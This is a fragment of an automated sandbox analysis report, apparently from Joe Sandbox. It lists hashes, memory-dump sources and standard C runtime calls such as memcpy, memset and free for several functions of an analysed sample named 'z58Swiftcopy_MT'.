                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FreeLocalmemcpymemsetstrlen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3110682361-0
                                                                                                                                                                                                                                      • Opcode ID: 897615c881cd852db71c2974e4c1980885af2901914c85ec6a63c0d2c90f3a68
                                                                                                                                                                                                                                      • Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 897615c881cd852db71c2974e4c1980885af2901914c85ec6a63c0d2c90f3a68
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 004161F4
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000004), ref: 00416218
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000004), ref: 0041623F
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000008), ref: 00416265
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3510742995-0
                                                                                                                                                                                                                                      • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                                                                                                                                                                      • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,?,0040402E,00000000,?,0040CD2D,00000000), ref: 004099A3
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,0040402E,00000000,?,0040CD2D,00000000), ref: 004099CC
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,0040402E,00000000,?,0040CD2D,00000000), ref: 004099ED
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,0040402E,00000000,?,0040CD2D,00000000), ref: 00409A0E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??2@$memset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1860491036-0
                                                                                                                                                                                                                                      • Opcode ID: 44f1797246307b9714e18617c58d8f8874aa2206c052adc2795802e4b5edafa2
                                                                                                                                                                                                                                      • Instruction ID: ded700a689dc4ea077b1bf28e8ae47d2b9e76a7afd7a7e1dd26f08861e755b16
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 44f1797246307b9714e18617c58d8f8874aa2206c052adc2795802e4b5edafa2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0B21B6B0A547508EE7558F6A9845A16FAE4FFD0710726C8AFD109DB2B2E7B8D8408F14
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040797A
                                                                                                                                                                                                                                      • free.MSVCRT ref: 0040799A
                                                                                                                                                                                                                                        • Part of subcall function 00406F30: malloc.MSVCRT ref: 00406F4C
                                                                                                                                                                                                                                        • Part of subcall function 00406F30: memcpy.MSVCRT(00000000,00000000,00000000,00000000,`-v,00407A43,00000001,?,00000000,`-v,00407DBD,00000000,?,?), ref: 00406F64
                                                                                                                                                                                                                                        • Part of subcall function 00406F30: free.MSVCRT ref: 00406F6D
                                                                                                                                                                                                                                      • free.MSVCRT ref: 004079BD
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,00000001,?,00000000,?,?,00407E04,?,00000000,?,?), ref: 004079DD
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: free$memcpy$mallocstrlen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3669619086-0
                                                                                                                                                                                                                                      • Opcode ID: 3e3945e45698e8c0ed6e18000fb0620d4112953eee6231efe07dba118771d5c8
                                                                                                                                                                                                                                      • Instruction ID: 28856836b01dc1c1490a34e4127c9d88e875caa212a522c6554fbe506b42c8ef
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3e3945e45698e8c0ed6e18000fb0620d4112953eee6231efe07dba118771d5c8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A211CDB1604600EFD720DF18D880E9AB7F5EF48328B108A2EE852A76D1C735F8158B59